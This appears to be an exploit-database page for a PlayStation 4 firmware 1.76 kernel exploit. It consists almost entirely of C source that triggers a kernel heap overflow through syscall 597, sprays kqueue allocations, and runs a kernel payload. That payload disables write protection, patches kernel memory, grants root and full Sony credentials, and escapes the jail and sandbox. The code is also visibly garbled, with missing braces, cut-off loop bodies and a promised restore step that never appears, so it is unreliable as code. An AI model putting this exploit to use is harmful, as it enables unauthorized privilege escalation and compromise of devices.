Sony playstation 4 (ps4) 1.76 dlclose linux kernel loader Vulnerability / Exploit

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Exploits / Vulnerability Discovered : 2016-04-27 | Type : local | Platform : hardware
This exploit / vulnerability Sony playstation 4 (ps4) 1.76 dlclose linux kernel loader is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

Code written based on info available here

See attached LICENCE file
Thanks to CTurt and qwertyoruiop

- @kr105rlz


#include "ps4.h"

#include "defines.h"

static int sock;
static void *dump;

void payload(struct knote *kn) {
struct thread *td;
struct ucred *cred;

// Get td pointer
asm volatile("mov %0, %%gs:0" : "=r"(td));

// Enable UART output
uint16_t *securityflags = (uint16_t*)0xFFFFFFFF833242F6;
*securityflags = *securityflags & ~(1 << 15); // bootparam_disable_console_output = 0

// Print test message to the UART line
printfkernel("\n\n\n\n\n\n\n\n\nHello from kernel :-)\n\n\n\n\n\n\n\n\n");

// Disable write protection
uint64_t cr0 = readCr0();
writeCr0(cr0 & ~X86_CR0_WP);

// sysctl_machdep_rcmgr_debug_menu and sysctl_machdep_rcmgr_store_moe
*(uint16_t *)0xFFFFFFFF82607C46 = 0x9090;
*(uint16_t *)0xFFFFFFFF82607826 = 0x9090;

*(char *)0xFFFFFFFF8332431A = 1;
*(char *)0xFFFFFFFF83324338 = 1;

// Restore write protection

// Resolve creds
cred = td->td_proc->p_ucred;

// Escalate process to root
cred->cr_uid = 0;
cred->cr_ruid = 0;
cred->cr_rgid = 0;
cred->cr_groups[0] = 0;

void *td_ucred = *(void **)(((char *)td) + 304); // p_ucred == td_ucred

// sceSblACMgrIsSystemUcred
uint64_t *sonyCred = (uint64_t *)(((char *)td_ucred) + 96);
*sonyCred = 0xffffffffffffffff;

// sceSblACMgrGetDeviceAccessType
uint64_t *sceProcType = (uint64_t *)(((char *)td_ucred) + 88);
*sceProcType = 0x3801000000000013; // Max access

// sceSblACMgrHasSceProcessCapability
uint64_t *sceProcCap = (uint64_t *)(((char *)td_ucred) + 104);
*sceProcCap = 0xffffffffffffffff; // Sce Process

((uint64_t *)0xFFFFFFFF832CC2E8)[0] = 0x123456; //priv_check_cred bypass with suser_enabled=true
((uint64_t *)0xFFFFFFFF8323DA18)[0] = 0; // bypass priv_check

// Jailbreak ;)
cred->cr_prison = (void *)0xFFFFFFFF83237250; //&prison0

// Break out of the sandbox
void *td_fdp = *(void **)(((char *)td->td_proc) + 72);
uint64_t *td_fdp_fd_rdir = (uint64_t *)(((char *)td_fdp) + 24);
uint64_t *td_fdp_fd_jdir = (uint64_t *)(((char *)td_fdp) + 32);
uint64_t *rootvnode = (uint64_t *)0xFFFFFFFF832EF920;
*td_fdp_fd_rdir = *rootvnode;
*td_fdp_fd_jdir = *rootvnode;

// Perform kernel allocation aligned to 0x800 bytes
int kernelAllocation(size_t size, int fd) {
SceKernelEqueue queue = 0;
sceKernelCreateEqueue(&queue, "kexec");

sceKernelAddReadEvent(queue, fd, 0, NULL);

return queue;

void kernelFree(int allocation) {

void *exploitThread(void *none) {
printfsocket("[+] Entered exploitThread\n");

uint64_t bufferSize = 0x8000;
uint64_t overflowSize = 0x8000;
uint64_t copySize = bufferSize + overflowSize;

// Round up to nearest multiple of PAGE_SIZE
uint64_t mappingSize = (copySize + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1);

uint8_t *mapping = mmap(NULL, mappingSize + PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
munmap(mapping + mappingSize, PAGE_SIZE);

uint8_t *buffer = mapping + mappingSize - copySize;

int64_t count = (0x100000000 + bufferSize) / 4;

// Create structures
struct knote kn;
struct filterops fo;
struct knote **overflow = (struct knote **)(buffer + bufferSize);
overflow[2] = &kn;
kn.kn_fop = &fo;

// Setup trampoline to gracefully return to the calling thread
void *trampw = NULL;
void *trampe = NULL;
int executableHandle;
int writableHandle;
uint8_t trampolinecode[] = {
0x58, // pop rax
0x48, 0xB8, 0x19, 0x39, 0x40, 0x82, 0xFF, 0xFF, 0xFF, 0xFF, // movabs rax, 0xffffffff82403919
0x50, // push rax
0x48, 0xB8, 0xBE, 0xBA, 0xAD, 0xDE, 0xDE, 0xC0, 0xAD, 0xDE, // movabs rax, 0xdeadc0dedeadbabe
0xFF, 0xE0 // jmp rax

// Get Jit memory
sceKernelJitCreateSharedMemory(0, PAGE_SIZE, PROT_CPU_READ | PROT_CPU_WRITE | PROT_CPU_EXEC, &executableHandle);
sceKernelJitCreateAliasOfSharedMemory(executableHandle, PROT_CPU_READ | PROT_CPU_WRITE, &writableHandle);

// Map r+w & r+e
trampe = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_EXEC, MAP_SHARED, executableHandle, 0);
trampw = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_TYPE, writableHandle, 0);

// Copy trampoline to allocated address
memcpy(trampw, trampolinecode, sizeof(trampolinecode));
*(void **)(trampw + 14) = (void *)payload;

// Call trampoline when overflown
fo.f_detach = trampe;

// Start the exploit
int sockets[0x2000];
int allocation[50], m = 0, m2 = 0;
int fd = (bufferSize - 0x800) / 8;

printfsocket("[+] Creating %d sockets\n", fd);

// Create sockets
for(int i = 0; i < 0x2000; i++) {
sockets[i] = sceNetSocket("sss", AF_INET, SOCK_STREAM, 0);
if(sockets[i] >= fd) {
sockets[i + 1] = -1;

// Spray the heap
for(int i = 0; i < 50; i++) {
allocation[i] = kernelAllocation(bufferSize, fd);
printfsocket("[+] allocation = %llp\n", allocation[i]);

// Create hole for the system call's allocation
m = kernelAllocation(bufferSize, fd);
m2 = kernelAllocation(bufferSize, fd);

// Perform the overflow
int result = syscall(597, 1, mapping, &count);
printfsocket("[+] Result: %d\n", result);

// Execute the payload
printfsocket("[+] Freeing m2\n");

// Close sockets
for(int i = 0; i < 0x2000; i++) {
if(sockets[i] == -1)

// Free allocations
for(int i = 0; i < 50; i++) {

// Free the mapping
munmap(mapping, mappingSize);

return NULL;

int _main(void) {
ScePthread thread;


struct sockaddr_in server;

server.sin_len = sizeof(server);
server.sin_family = AF_INET;
server.sin_addr.s_addr = IP(192, 168, 0, 4);
server.sin_port = sceNetHtons(9023);
memset(server.sin_zero, 0, sizeof(server.sin_zero));
sock = sceNetSocket("debug", AF_INET, SOCK_STREAM, 0);
sceNetConnect(sock, (struct sockaddr *)&server, sizeof(server));

int flag = 1;
sceNetSetsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (char *)&flag, sizeof(int));


printfsocket("[+] Starting...\n");
printfsocket("[+] UID = %d\n", getuid());
printfsocket("[+] GID = %d\n", getgid());

// Create exploit thread
if(scePthreadCreate(&thread, NULL, exploitThread, NULL, "exploitThread") != 0) {
printfsocket("[-] pthread_create error\n");
return 0;

// Wait for thread to exit
scePthreadJoin(thread, NULL);

// At this point we should have root and jailbreak
if(getuid() != 0) {
printfsocket("[-] Kernel patch failed!\n");
return 1;

printfsocket("[+] Kernel patch success!\n");

// Enable debug menu
int (*sysctlbyname)(const char *name, void *oldp, size_t *oldlenp, const void *newp, size_t newlen) = NULL;
RESOLVE(libKernelHandle, sysctlbyname);

uint32_t enable;
size_t size;

enable = 1;
size = sizeof(enable);

sysctlbyname("machdep.rcmgr_utoken_store_mode", NULL, NULL, &enable, size);
sysctlbyname("machdep.rcmgr_debug_menu", NULL, NULL, &enable, size);

munmap(dump, PAGE_SIZE);

printfsocket("[+] bye\n");

return 0;